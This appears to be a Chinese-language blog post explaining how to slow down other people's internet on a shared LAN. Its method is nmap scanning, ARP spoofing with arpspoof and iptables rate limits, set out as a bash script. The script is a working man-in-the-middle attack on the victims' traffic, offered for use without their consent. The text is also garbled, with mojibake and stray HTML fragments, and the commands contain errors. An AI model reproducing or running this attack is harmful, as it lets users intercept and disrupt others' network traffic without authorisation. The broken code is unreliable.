為了限制無線路由器上大家的上網(wǎng)速度����,減少p2p工具的影響
可以通過arp欺騙和iptables來限制局域網(wǎng)的上網(wǎng)速度
操作系統(tǒng):Ubuntu
1)sudo apt-get install dsniff nmap
2)探測局域網(wǎng)主機的ip地址
sudo nmap -ss 網(wǎng)關ip/24
在此例中:
192.168.1.100 為要限速的主機
192.168.1.1 為網(wǎng)關地址
3)打開 內(nèi)核的 IP 轉(zhuǎn)發(fā)�,讓我們的主機成為路由器
echo 1 > /proc/sys/net/ipv4/ip_forward
4)使用 iptables和arpspoof進行 限速! 腳本如下
使用方式:
sudo ./iptable.sh 要限的速度(30為40k/s) 網(wǎng)關ip 限速主機1 限速主機2
#!/bin/bash
if [ $# -le 2 ]
then
echo "Usage: ./iptables.sh speed gateway ip1 ip2 ...."
exit -1
else
speed=$1
gateway=$2
fi
IPT=/sbin/iptables/p>
p>while [ $# -gt 2 ]
do
shift
echo $gateway,$2
arpspoof -i eth0 -t $2 $gateway
arpspoof -i eth0 -t $gateway $2/p>
p> $IPT -A FORWARD -s $2 -m limit --limit ${speed}/s -j accept/p>
p> $IPT -A FORWARD -d $2 -m limit --limit ${speed}/s -j ACCEPT/p>
p> $IPT -A FORWARD -s $2 -j DROP/p>
p> $IPT -A FORWARD -d $2 -j DROP/p>
p>done
